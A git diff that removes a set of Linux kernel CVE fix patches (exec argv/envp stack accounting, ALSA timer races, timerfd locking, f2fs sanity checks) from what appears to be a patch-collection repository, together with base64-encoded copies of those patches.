IGFub25fdm1hIGxvY2tpbmcgaXMgbm90IGEgbm9vcC4KIAkgKi8KLQkvKiBHdWFyZCBhZ2FpbnN0IHdyYXBwaW5nIGFyb3VuZCB0byBhZGRyZXNzIDAuICovCisJLyogR3VhcmQgYWdhaW5zdCBleGNlZWRpbmcgbGltaXRzIG9mIHRoZSBhZGRyZXNzIHNwYWNlLiAqLwogCWFkZHJlc3MgJj0gUEFHRV9NQVNLOwotCWFkZHJlc3MgKz0gUEFHRV9TSVpFOwotCWlmICghYWRkcmVzcykKKwlpZiAoYWRkcmVzcyA+PSBUQVNLX1NJWkUpCiAJCXJldHVybiAtRU5PTUVNOworCWFkZHJlc3MgKz0gUEFHRV9TSVpFOwogCiAJLyogRW5mb3JjZSBzdGFja19ndWFyZF9nYXAgKi8KIAlnYXBfYWRkciA9IGFkZHJlc3MgKyBzdGFja19ndWFyZF9nYXA7Ci0JaWYgKGdhcF9hZGRyIDwgYWRkcmVzcykKLQkJcmV0dXJuIC1FTk9NRU07CisKKwkvKiBHdWFyZCBhZ2FpbnN0IG92ZXJmbG93ICovCisJaWYgKGdhcF9hZGRyIDwgYWRkcmVzcyB8fCBnYXBfYWRkciA+IFRBU0tfU0laRSkKKwkJZ2FwX2FkZHIgPSBUQVNLX1NJWkU7CisKIAluZXh0ID0gdm1hLT52bV9uZXh0OwogCWlmIChuZXh0ICYmIG5leHQtPnZtX3N0YXJ0IDwgZ2FwX2FkZHIpIHsKIAkJaWYgKCEobmV4dC0+dm1fZmxhZ3MgJiBWTV9HUk9XU1VQKSkK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-1000365/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-1000365/3.10/0001.patch
deleted file mode 100644
index ec8c96f7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000365/3.10/0001.patch
+++ /dev/null
@@ -1,87 +0,0 @@
-From 848cd959a1d95625ae12ff763508364f517ab858 Mon Sep 17 00:00:00 2001
-From: Kees Cook <keescook@chromium.org>
-Date: Fri, 23 Jun 2017 15:08:57 -0700
-Subject: [PATCH] fs/exec.c: account for argv/envp pointers
-
-commit 98da7d08850fb8bdeb395d6368ed15753304aa0c upstream.
-
-When limiting the argv/envp strings during exec to 1/4 of the stack limit,
-the storage of the pointers to the strings was not included.  This means
-that an exec with huge numbers of tiny strings could eat 1/4 of the stack
-limit in strings and then additional space would be later used by the
-pointers to the strings.
-
-For example, on 32-bit with a 8MB stack rlimit, an exec with 1677721
-single-byte strings would consume less than 2MB of stack, the max (8MB /
-4) amount allowed, but the pointers to the strings would consume the
-remaining additional stack space (1677721 * 4 == 6710884).
-
-The result (1677721 + 6710884 == 8388605) would exhaust stack space
-entirely.  Controlling this stack exhaustion could result in
-pathological behavior in setuid binaries (CVE-2017-1000365).
-
-[akpm@linux-foundation.org: additional commenting from Kees]
-Fixes: b6a2fea39318 ("mm: variable length argument support")
-Link: http://lkml.kernel.org/r/20170622001720.GA32173@beast
-Signed-off-by: Kees Cook <keescook@chromium.org>
-Acked-by: Rik van Riel <riel@redhat.com>
-Acked-by: Michal Hocko <mhocko@suse.com>
-Cc: Alexander Viro <viro@zeniv.linux.org.uk>
-Cc: Qualys Security Advisory <qsa@qualys.com>
-Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
-Change-Id: I9db26a068e9448fb688a87fe3bae876f23483583
----
-
-diff --git a/fs/exec.c b/fs/exec.c
-index 5725280..7d5dbc0 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -196,7 +196,25 @@
- 
- 	if (write) {
- 		unsigned long size = bprm->vma->vm_end - bprm->vma->vm_start;
-+		unsigned long ptr_size;
- 		struct rlimit *rlim;
-+
-+		/*
-+		 * Since the stack will hold pointers to the strings, we
-+		 * must account for them as well.
-+		 *
-+		 * The size calculation is the entire vma while each arg page is
-+		 * built, so each time we get here it's calculating how far it
-+		 * is currently (rather than each call being just the newly
-+		 * added size from the arg page).  As a result, we need to
-+		 * always add the entire size of the pointers, so that on the
-+		 * last call to get_arg_page() we'll actually have the entire
-+		 * correct size.
-+		 */
-+		ptr_size = (bprm->argc + bprm->envc) * sizeof(void *);
-+		if (ptr_size > ULONG_MAX - size)
-+			goto fail;
-+		size += ptr_size;
- 
- 		acct_arg_size(bprm, size / PAGE_SIZE);
- 
-@@ -215,13 +233,15 @@
- 		 *    to work from.
- 		 */
- 		rlim = current->signal->rlim;
--		if (size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur) / 4) {
--			put_page(page);
--			return NULL;
--		}
-+		if (size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur) / 4)
-+			goto fail;
- 	}
- 
- 	return page;
-+
-+fail:
-+	put_page(page);
-+	return NULL;
- }
- 
- static void put_arg_page(struct page *page)
diff --git a/Patches/Linux_CVEs/CVE-2017-1000365/3.10/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-1000365/3.10/0001.patch.base64
deleted file mode 100644
index 456c004f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000365/3.10/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSA4NDhjZDk1OWExZDk1NjI1YWUxMmZmNzYzNTA4MzY0ZjUxN2FiODU4IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBLZWVzIENvb2sgPGtlZXNjb29rQGNocm9taXVtLm9yZz4KRGF0ZTogRnJpLCAyMyBKdW4gMjAxNyAxNTowODo1NyAtMDcwMApTdWJqZWN0OiBbUEFUQ0hdIGZzL2V4ZWMuYzogYWNjb3VudCBmb3IgYXJndi9lbnZwIHBvaW50ZXJzCgpjb21taXQgOThkYTdkMDg4NTBmYjhiZGViMzk1ZDYzNjhlZDE1NzUzMzA0YWEwYyB1cHN0cmVhbS4KCldoZW4gbGltaXRpbmcgdGhlIGFyZ3YvZW52cCBzdHJpbmdzIGR1cmluZyBleGVjIHRvIDEvNCBvZiB0aGUgc3RhY2sgbGltaXQsCnRoZSBzdG9yYWdlIG9mIHRoZSBwb2ludGVycyB0byB0aGUgc3RyaW5ncyB3YXMgbm90IGluY2x1ZGVkLiAgVGhpcyBtZWFucwp0aGF0IGFuIGV4ZWMgd2l0aCBodWdlIG51bWJlcnMgb2YgdGlueSBzdHJpbmdzIGNvdWxkIGVhdCAxLzQgb2YgdGhlIHN0YWNrCmxpbWl0IGluIHN0cmluZ3MgYW5kIHRoZW4gYWRkaXRpb25hbCBzcGFjZSB3b3VsZCBiZSBsYXRlciB1c2VkIGJ5IHRoZQpwb2ludGVycyB0byB0aGUgc3RyaW5ncy4KCkZvciBleGFtcGxlLCBvbiAzMi1iaXQgd2l0aCBhIDhNQiBzdGFjayBybGltaXQsIGFuIGV4ZWMgd2l0aCAxNjc3NzIxCnNpbmdsZS1ieXRlIHN0cmluZ3Mgd291bGQgY29uc3VtZSBsZXNzIHRoYW4gMk1CIG9mIHN0YWNrLCB0aGUgbWF4ICg4TUIgLwo0KSBhbW91bnQgYWxsb3dlZCwgYnV0IHRoZSBwb2ludGVycyB0byB0aGUgc3RyaW5ncyB3b3VsZCBjb25zdW1lIHRoZQpyZW1haW5pbmcgYWRkaXRpb25hbCBzdGFjayBzcGFjZSAoMTY3NzcyMSAqIDQgPT0gNjcxMDg4NCkuCgpUaGUgcmVzdWx0ICgxNjc3NzIxICsgNjcxMDg4NCA9PSA4Mzg4NjA1KSB3b3VsZCBleGhhdXN0IHN0YWNrIHNwYWNlCmVudGlyZWx5LiAgQ29udHJvbGxpbmcgdGhpcyBzdGFjayBleGhhdXN0aW9uIGNvdWxkIHJlc3VsdCBpbgpwYXRob2xvZ2ljYWwgYmVoYXZpb3IgaW4gc2V0dWlkIGJpbmFyaWVzIChDVkUtMjAxNy0xMDAwMzY1KS4KCltha3BtQGxpbnV4LWZvdW5kYXRpb24ub3JnOiBhZGRpdGlvbmFsIGNvbW1lbnRpbmcgZnJvbSBLZWVzXQpGaXhlczogYjZhMmZlYTM5MzE4ICgibW06IHZhcmlhYmxlIGxlbmd0aCBhcmd1bWVudCBzdXBwb3J0IikKTGluazogaHR0cDovL2xrbWwua2VybmVsLm9yZy9yLzIwMTcwNjIyMDAxNzIwLkdBMzIxNzNAYmVhc3QKU2lnbmVkLW9mZi1ieTogS2VlcyBDb29rIDxrZWVzY29va0BjaHJvbWl1bS5vcmc+CkFja2VkLWJ5OiBSaWsgdmFuIFJpZWwgPHJpZWxAcmVkaGF0LmNvbT4KQWNrZWQtYnk6IE1pY2hhbCBIb2NrbyA8bWhvY2tvQHN1c2UuY29tPgpDYzogQWxleGFuZGVyIFZpcm8gPHZpcm9AemVuaXYubGludXgub3JnLnVrPgpDYzogUXVhbHlzIFNlY3VyaXR5IEFkdmlzb3J5IDxxc2FAcXVhbHlzLmNvbT4KU2lnbmVkLW9mZi1ieTogQW5kcmV3IE1vcnRvbiA8YWtwbUBsaW51eC1mb3VuZGF0aW9uLm9yZz4KU2lnbmVkLW9mZi1ieTogTGludXMgVG9ydmFsZHMgPHRvcnZhbGRzQGxpbnV4LWZvdW5kYXRpb24ub3JnPgpTaWduZWQtb2ZmLWJ5OiBHcmVnIEtyb2FoLUhhcnRtYW4gPGdyZWdraEBsaW51eGZvdW5kYXRpb24ub3JnPgoKQ2hhbmdlLUlkOiBJOWRiMjZhMDY4ZTk0NDhmYjY4OGE4N2ZlM2JhZTg3NmYyMzQ4MzU4MwotLS0KCmRpZmYgLS1naXQgYS9mcy9leGVjLmMgYi9mcy9leGVjLmMKaW5kZXggNTcyNTI4MC4uN2Q1ZGJjMCAxMDA2NDQKLS0tIGEvZnMvZXhlYy5jCisrKyBiL2ZzL2V4ZWMuYwpAQCAtMTk2LDcgKzE5NiwyNSBAQAogCiAJaWYgKHdyaXRlKSB7CiAJCXVuc2lnbmVkIGxvbmcgc2l6ZSA9IGJwcm0tPnZtYS0+dm1fZW5kIC0gYnBybS0+dm1hLT52bV9zdGFydDsKKwkJdW5zaWduZWQgbG9uZyBwdHJfc2l6ZTsKIAkJc3RydWN0IHJsaW1pdCAqcmxpbTsKKworCQkvKgorCQkgKiBTaW5jZSB0aGUgc3RhY2sgd2lsbCBob2xkIHBvaW50ZXJzIHRvIHRoZSBzdHJpbmdzLCB3ZQorCQkgKiBtdXN0IGFjY291bnQgZm9yIHRoZW0gYXMgd2VsbC4KKwkJICoKKwkJICogVGhlIHNpemUgY2FsY3VsYXRpb24gaXMgdGhlIGVudGlyZSB2bWEgd2hpbGUgZWFjaCBhcmcgcGFnZSBpcworCQkgKiBidWlsdCwgc28gZWFjaCB0aW1lIHdlIGdldCBoZXJlIGl0J3MgY2FsY3VsYXRpbmcgaG93IGZhciBpdAorCQkgKiBpcyBjdXJyZW50bHkgKHJhdGhlciB0aGFuIGVhY2ggY2FsbCBiZWluZyBqdXN0IHRoZSBuZXdseQorCQkgKiBhZGRlZCBzaXplIGZyb20gdGhlIGFyZyBwYWdlKS4gIEFzIGEgcmVzdWx0LCB3ZSBuZWVkIHRvCisJCSAqIGFsd2F5cyBhZGQgdGhlIGVudGlyZSBzaXplIG9mIHRoZSBwb2ludGVycywgc28gdGhhdCBvbiB0aGUKKwkJICogbGFzdCBjYWxsIHRvIGdldF9hcmdfcGFnZSgpIHdlJ2xsIGFjdHVhbGx5IGhhdmUgdGhlIGVudGlyZQorCQkgKiBjb3JyZWN0IHNpemUuCisJCSAqLworCQlwdHJfc2l6ZSA9IChicHJtLT5hcmdjICsgYnBybS0+ZW52YykgKiBzaXplb2Yodm9pZCAqKTsKKwkJaWYgKHB0cl9zaXplID4gVUxPTkdfTUFYIC0gc2l6ZSkKKwkJCWdvdG8gZmFpbDsKKwkJc2l6ZSArPSBwdHJfc2l6ZTsKIAogCQlhY2N0X2FyZ19zaXplKGJwcm0sIHNpemUgLyBQQUdFX1NJWkUpOwogCkBAIC0yMTUsMTMgKzIzMywxNSBAQAogCQkgKiAgICB0byB3b3JrIGZyb20uCiAJCSAqLwogCQlybGltID0gY3VycmVudC0+c2lnbmFsLT5ybGltOwotCQlpZiAoc2l6ZSA+IEFDQ0VTU19PTkNFKHJsaW1bUkxJTUlUX1NUQUNLXS5ybGltX2N1cikgLyA0KSB7Ci0JCQlwdXRfcGFnZShwYWdlKTsKLQkJCXJldHVybiBOVUxMOwotCQl9CisJCWlmIChzaXplID4gQUNDRVNTX09OQ0UocmxpbVtSTElNSVRfU1RBQ0tdLnJsaW1fY3VyKSAvIDQpCisJCQlnb3RvIGZhaWw7CiAJfQogCiAJcmV0dXJuIHBhZ2U7CisKK2ZhaWw6CisJcHV0X3BhZ2UocGFnZSk7CisJcmV0dXJuIE5VTEw7CiB9CiAKIHN0YXRpYyB2b2lkIHB1dF9hcmdfcGFnZShzdHJ1Y3QgcGFnZSAqcGFnZSkK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-1000365/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-1000365/3.18/0002.patch
deleted file mode 100644
index a20274df..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000365/3.18/0002.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From 2dff2164d171e9c27f2f7fa778d408ecf4d1e1ea Mon Sep 17 00:00:00 2001
-From: Kees Cook <keescook@chromium.org>
-Date: Fri, 23 Jun 2017 15:08:57 -0700
-Subject: fs/exec.c: account for argv/envp pointers
-
-commit 98da7d08850fb8bdeb395d6368ed15753304aa0c upstream.
-
-When limiting the argv/envp strings during exec to 1/4 of the stack limit,
-the storage of the pointers to the strings was not included.  This means
-that an exec with huge numbers of tiny strings could eat 1/4 of the stack
-limit in strings and then additional space would be later used by the
-pointers to the strings.
-
-For example, on 32-bit with a 8MB stack rlimit, an exec with 1677721
-single-byte strings would consume less than 2MB of stack, the max (8MB /
-4) amount allowed, but the pointers to the strings would consume the
-remaining additional stack space (1677721 * 4 == 6710884).
-
-The result (1677721 + 6710884 == 8388605) would exhaust stack space
-entirely.  Controlling this stack exhaustion could result in
-pathological behavior in setuid binaries (CVE-2017-1000365).
-
-[akpm@linux-foundation.org: additional commenting from Kees]
-Fixes: b6a2fea39318 ("mm: variable length argument support")
-Link: http://lkml.kernel.org/r/20170622001720.GA32173@beast
-Signed-off-by: Kees Cook <keescook@chromium.org>
-Acked-by: Rik van Riel <riel@redhat.com>
-Acked-by: Michal Hocko <mhocko@suse.com>
-Cc: Alexander Viro <viro@zeniv.linux.org.uk>
-Cc: Qualys Security Advisory <qsa@qualys.com>
-Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- fs/exec.c | 28 ++++++++++++++++++++++++----
- 1 file changed, 24 insertions(+), 4 deletions(-)
-
-diff --git a/fs/exec.c b/fs/exec.c
-index fe9ec45..6fa04b3 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -199,8 +199,26 @@ static struct page *get_arg_page(struct linux_binprm *bprm, unsigned long pos,
- 
- 	if (write) {
- 		unsigned long size = bprm->vma->vm_end - bprm->vma->vm_start;
-+		unsigned long ptr_size;
- 		struct rlimit *rlim;
- 
-+		/*
-+		 * Since the stack will hold pointers to the strings, we
-+		 * must account for them as well.
-+		 *
-+		 * The size calculation is the entire vma while each arg page is
-+		 * built, so each time we get here it's calculating how far it
-+		 * is currently (rather than each call being just the newly
-+		 * added size from the arg page).  As a result, we need to
-+		 * always add the entire size of the pointers, so that on the
-+		 * last call to get_arg_page() we'll actually have the entire
-+		 * correct size.
-+		 */
-+		ptr_size = (bprm->argc + bprm->envc) * sizeof(void *);
-+		if (ptr_size > ULONG_MAX - size)
-+			goto fail;
-+		size += ptr_size;
-+
- 		acct_arg_size(bprm, size / PAGE_SIZE);
- 
- 		/*
-@@ -218,13 +236,15 @@ static struct page *get_arg_page(struct linux_binprm *bprm, unsigned long pos,
- 		 *    to work from.
- 		 */
- 		rlim = current->signal->rlim;
--		if (size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur) / 4) {
--			put_page(page);
--			return NULL;
--		}
-+		if (size > READ_ONCE(rlim[RLIMIT_STACK].rlim_cur) / 4)
-+			goto fail;
- 	}
- 
- 	return page;
-+
-+fail:
-+	put_page(page);
-+	return NULL;
- }
- 
- static void put_arg_page(struct page *page)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-1000380/^4.11/0001.patch b/Patches/Linux_CVEs/CVE-2017-1000380/^4.11/0001.patch
deleted file mode 100644
index 1bf26f3f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000380/^4.11/0001.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From ba3021b2c79b2fa9114f92790a99deb27a65b728 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai <tiwai@suse.de>
-Date: Fri, 2 Jun 2017 17:26:56 +0200
-Subject: ALSA: timer: Fix missing queue indices reset at
- SNDRV_TIMER_IOCTL_SELECT
-
-snd_timer_user_tselect() reallocates the queue buffer dynamically, but
-it forgot to reset its indices.  Since the read may happen
-concurrently with ioctl and snd_timer_user_tselect() allocates the
-buffer via kmalloc(), this may lead to the leak of uninitialized
-kernel-space data, as spotted via KMSAN:
-
-  BUG: KMSAN: use of unitialized memory in snd_timer_user_read+0x6c4/0xa10
-  CPU: 0 PID: 1037 Comm: probe Not tainted 4.11.0-rc5+ #2739
-  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
-  Call Trace:
-   __dump_stack lib/dump_stack.c:16
-   dump_stack+0x143/0x1b0 lib/dump_stack.c:52
-   kmsan_report+0x12a/0x180 mm/kmsan/kmsan.c:1007
-   kmsan_check_memory+0xc2/0x140 mm/kmsan/kmsan.c:1086
-   copy_to_user ./arch/x86/include/asm/uaccess.h:725
-   snd_timer_user_read+0x6c4/0xa10 sound/core/timer.c:2004
-   do_loop_readv_writev fs/read_write.c:716
-   __do_readv_writev+0x94c/0x1380 fs/read_write.c:864
-   do_readv_writev fs/read_write.c:894
-   vfs_readv fs/read_write.c:908
-   do_readv+0x52a/0x5d0 fs/read_write.c:934
-   SYSC_readv+0xb6/0xd0 fs/read_write.c:1021
-   SyS_readv+0x87/0xb0 fs/read_write.c:1018
-
-This patch adds the missing reset of queue indices.  Together with the
-previous fix for the ioctl/read race, we cover the whole problem.
-
-Reported-by: Alexander Potapenko <glider@google.com>
-Tested-by: Alexander Potapenko <glider@google.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/core/timer.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/sound/core/timer.c b/sound/core/timer.c
-index 1118bd8..cd67d1c 100644
---- a/sound/core/timer.c
-+++ b/sound/core/timer.c
-@@ -1618,6 +1618,7 @@ static int snd_timer_user_tselect(struct file *file,
- 	if (err < 0)
- 		goto __err;
- 
-+	tu->qhead = tu->qtail = tu->qused = 0;
- 	kfree(tu->queue);
- 	tu->queue = NULL;
- 	kfree(tu->tqueue);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-1000380/^4.11/0002.patch b/Patches/Linux_CVEs/CVE-2017-1000380/^4.11/0002.patch
deleted file mode 100644
index 8a55d454..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000380/^4.11/0002.patch
+++ /dev/null
@@ -1,73 +0,0 @@
-From d11662f4f798b50d8c8743f433842c3e40fe3378 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai <tiwai@suse.de>
-Date: Fri, 2 Jun 2017 15:03:38 +0200
-Subject: ALSA: timer: Fix race between read and ioctl
-
-The read from ALSA timer device, the function snd_timer_user_tread(),
-may access to an uninitialized struct snd_timer_user fields when the
-read is concurrently performed while the ioctl like
-snd_timer_user_tselect() is invoked.  We have already fixed the races
-among ioctls via a mutex, but we seem to have forgotten the race
-between read vs ioctl.
-
-This patch simply applies (more exactly extends the already applied
-range of) tu->ioctl_lock in snd_timer_user_tread() for closing the
-race window.
-
-Reported-by: Alexander Potapenko <glider@google.com>
-Tested-by: Alexander Potapenko <glider@google.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/core/timer.c | 6 ++++--
- 1 file changed, 4 insertions(+), 2 deletions(-)
-
-diff --git a/sound/core/timer.c b/sound/core/timer.c
-index 2f836ca..1118bd8 100644
---- a/sound/core/timer.c
-+++ b/sound/core/timer.c
-@@ -1959,6 +1959,7 @@ static ssize_t snd_timer_user_read(struct file *file, char __user *buffer,
- 
- 	tu = file->private_data;
- 	unit = tu->tread ? sizeof(struct snd_timer_tread) : sizeof(struct snd_timer_read);
-+	mutex_lock(&tu->ioctl_lock);
- 	spin_lock_irq(&tu->qlock);
- 	while ((long)count - result >= unit) {
- 		while (!tu->qused) {
-@@ -1974,7 +1975,9 @@ static ssize_t snd_timer_user_read(struct file *file, char __user *buffer,
- 			add_wait_queue(&tu->qchange_sleep, &wait);
- 
- 			spin_unlock_irq(&tu->qlock);
-+			mutex_unlock(&tu->ioctl_lock);
- 			schedule();
-+			mutex_lock(&tu->ioctl_lock);
- 			spin_lock_irq(&tu->qlock);
- 
- 			remove_wait_queue(&tu->qchange_sleep, &wait);
-@@ -1994,7 +1997,6 @@ static ssize_t snd_timer_user_read(struct file *file, char __user *buffer,
- 		tu->qused--;
- 		spin_unlock_irq(&tu->qlock);
- 
--		mutex_lock(&tu->ioctl_lock);
- 		if (tu->tread) {
- 			if (copy_to_user(buffer, &tu->tqueue[qhead],
- 					 sizeof(struct snd_timer_tread)))
-@@ -2004,7 +2006,6 @@ static ssize_t snd_timer_user_read(struct file *file, char __user *buffer,
- 					 sizeof(struct snd_timer_read)))
- 				err = -EFAULT;
- 		}
--		mutex_unlock(&tu->ioctl_lock);
- 
- 		spin_lock_irq(&tu->qlock);
- 		if (err < 0)
-@@ -2014,6 +2015,7 @@ static ssize_t snd_timer_user_read(struct file *file, char __user *buffer,
- 	}
-  _error:
- 	spin_unlock_irq(&tu->qlock);
-+	mutex_unlock(&tu->ioctl_lock);
- 	return result > 0 ? result : err;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-10661/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-10661/ANY/0001.patch
deleted file mode 100644
index 7c808aa5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-10661/ANY/0001.patch
+++ /dev/null
@@ -1,95 +0,0 @@
-From 1e38da300e1e395a15048b0af1e5305bd91402f6 Mon Sep 17 00:00:00 2001
-From: Thomas Gleixner <tglx@linutronix.de>
-Date: Tue, 31 Jan 2017 15:24:03 +0100
-Subject: timerfd: Protect the might cancel mechanism proper
-
-The handling of the might_cancel queueing is not properly protected, so
-parallel operations on the file descriptor can race with each other and
-lead to list corruptions or use after free.
-
-Protect the context for these operations with a seperate lock.
-
-The wait queue lock cannot be reused for this because that would create a
-lock inversion scenario vs. the cancel lock. Replacing might_cancel with an
-atomic (atomic_t or atomic bit) does not help either because it still can
-race vs. the actual list operation.
-
-Reported-by: Dmitry Vyukov <dvyukov@google.com>
-Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
-Cc: "linux-fsdevel@vger.kernel.org"
-Cc: syzkaller <syzkaller@googlegroups.com>
-Cc: Al Viro <viro@zeniv.linux.org.uk>
-Cc: linux-fsdevel@vger.kernel.org
-Link: http://lkml.kernel.org/r/alpine.DEB.2.20.1701311521430.3457@nanos
-Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
----
- fs/timerfd.c | 17 ++++++++++++++---
- 1 file changed, 14 insertions(+), 3 deletions(-)
-
-diff --git a/fs/timerfd.c b/fs/timerfd.c
-index c173cc1..384fa75 100644
---- a/fs/timerfd.c
-+++ b/fs/timerfd.c
-@@ -40,6 +40,7 @@ struct timerfd_ctx {
- 	short unsigned settime_flags;	/* to show in fdinfo */
- 	struct rcu_head rcu;
- 	struct list_head clist;
-+	spinlock_t cancel_lock;
- 	bool might_cancel;
- };
- 
-@@ -112,7 +113,7 @@ void timerfd_clock_was_set(void)
- 	rcu_read_unlock();
- }
- 
--static void timerfd_remove_cancel(struct timerfd_ctx *ctx)
-+static void __timerfd_remove_cancel(struct timerfd_ctx *ctx)
- {
- 	if (ctx->might_cancel) {
- 		ctx->might_cancel = false;
-@@ -122,6 +123,13 @@ static void timerfd_remove_cancel(struct timerfd_ctx *ctx)
- 	}
- }
- 
-+static void timerfd_remove_cancel(struct timerfd_ctx *ctx)
-+{
-+	spin_lock(&ctx->cancel_lock);
-+	__timerfd_remove_cancel(ctx);
-+	spin_unlock(&ctx->cancel_lock);
-+}
-+
- static bool timerfd_canceled(struct timerfd_ctx *ctx)
- {
- 	if (!ctx->might_cancel || ctx->moffs != KTIME_MAX)
-@@ -132,6 +140,7 @@ static bool timerfd_canceled(struct timerfd_ctx *ctx)
- 
- static void timerfd_setup_cancel(struct timerfd_ctx *ctx, int flags)
- {
-+	spin_lock(&ctx->cancel_lock);
- 	if ((ctx->clockid == CLOCK_REALTIME ||
- 	     ctx->clockid == CLOCK_REALTIME_ALARM) &&
- 	    (flags & TFD_TIMER_ABSTIME) && (flags & TFD_TIMER_CANCEL_ON_SET)) {
-@@ -141,9 +150,10 @@ static void timerfd_setup_cancel(struct timerfd_ctx *ctx, int flags)
- 			list_add_rcu(&ctx->clist, &cancel_list);
- 			spin_unlock(&cancel_lock);
- 		}
--	} else if (ctx->might_cancel) {
--		timerfd_remove_cancel(ctx);
-+	} else {
-+		__timerfd_remove_cancel(ctx);
- 	}
-+	spin_unlock(&ctx->cancel_lock);
- }
- 
- static ktime_t timerfd_get_remaining(struct timerfd_ctx *ctx)
-@@ -400,6 +410,7 @@ SYSCALL_DEFINE2(timerfd_create, int, clockid, int, flags)
- 		return -ENOMEM;
- 
- 	init_waitqueue_head(&ctx->wqh);
-+	spin_lock_init(&ctx->cancel_lock);
- 	ctx->clockid = clockid;
- 
- 	if (isalarm(ctx))
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-10662/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-10662/ANY/0001.patch
deleted file mode 100644
index 89dc91f3..00000000
--- a/Patches/Linux_CVEs/CVE-2017-10662/ANY/0001.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From b9dd46188edc2f0d1f37328637860bb65a771124 Mon Sep 17 00:00:00 2001
-From: Jin Qian <jinqian@google.com>
-Date: Tue, 25 Apr 2017 16:28:48 -0700
-Subject: f2fs: sanity check segment count
-
-F2FS uses 4 bytes to represent block address. As a result, supported
-size of disk is 16 TB and it equals to 16 * 1024 * 1024 / 2 segments.
-
-Signed-off-by: Jin Qian <jinqian@google.com>
-Signed-off-by: Jaegeuk Kim <jaegeuk@kernel.org>
----
- fs/f2fs/super.c         | 7 +++++++
- include/linux/f2fs_fs.h | 6 ++++++
- 2 files changed, 13 insertions(+)
-
-diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
-index 97c07a5..4cd3bee 100644
---- a/fs/f2fs/super.c
-+++ b/fs/f2fs/super.c
-@@ -1494,6 +1494,13 @@ static int sanity_check_raw_super(struct f2fs_sb_info *sbi,
- 		return 1;
- 	}
- 
-+	if (le32_to_cpu(raw_super->segment_count) > F2FS_MAX_SEGMENT) {
-+		f2fs_msg(sb, KERN_INFO,
-+			"Invalid segment count (%u)",
-+			le32_to_cpu(raw_super->segment_count));
-+		return 1;
-+	}
-+
- 	/* check CP/SIT/NAT/SSA/MAIN_AREA area boundary */
- 	if (sanity_check_area_boundary(sbi, bh))
- 		return 1;
-diff --git a/include/linux/f2fs_fs.h b/include/linux/f2fs_fs.h
-index 639cbdf..093549e 100644
---- a/include/linux/f2fs_fs.h
-+++ b/include/linux/f2fs_fs.h
-@@ -302,6 +302,12 @@ struct f2fs_nat_block {
- #define SIT_ENTRY_PER_BLOCK (PAGE_SIZE / sizeof(struct f2fs_sit_entry))
- 
- /*
-+ * F2FS uses 4 bytes to represent block address. As a result, supported size of
-+ * disk is 16 TB and it equals to 16 * 1024 * 1024 / 2 segments.
-+ */
-+#define F2FS_MAX_SEGMENT       ((16 * 1024 * 1024) / 2)
-+
-+/*
-  * Note that f2fs_sit_entry->vblocks has the following bit-field information.
-  * [15:10] : allocation type such as CURSEG_XXXX_TYPE
-  * [9:0] : valid block count
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-10663/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-10663/3.10/0001.patch
deleted file mode 100644
index 2b50cc9b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-10663/3.10/0001.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 2b97ce290c589827e21838c70c9c5601b663037a Mon Sep 17 00:00:00 2001
-From: Jin Qian <jinqian@android.com>
-Date: Thu, 11 May 2017 16:15:15 -0700
-Subject: [PATCH] BACKPORT: f2fs: sanity check checkpoint segno and blkoff
-
-Make sure segno and blkoff read from raw image are valid.
-
-Fixed conflicts due to missing commit 1e968fdfe69e
-("f2fs: introduce f2fs_cp_error for readability") and commit 6bacf52fb58a
-("f2fs: add unlikely() macro for compiler more aggressively").
-
-(url https://sourceforge.net/p/linux-f2fs/mailman/message/35835945)
-
-Signed-off-by: Jin Qian <jinqian@google.com>
-Signed-off-by: Siqi Lin <siqilin@google.com>
-Bug: 36588520
-Change-Id: Iba66ab97d3d0870ea48b5ef192d9075f225a934a
----
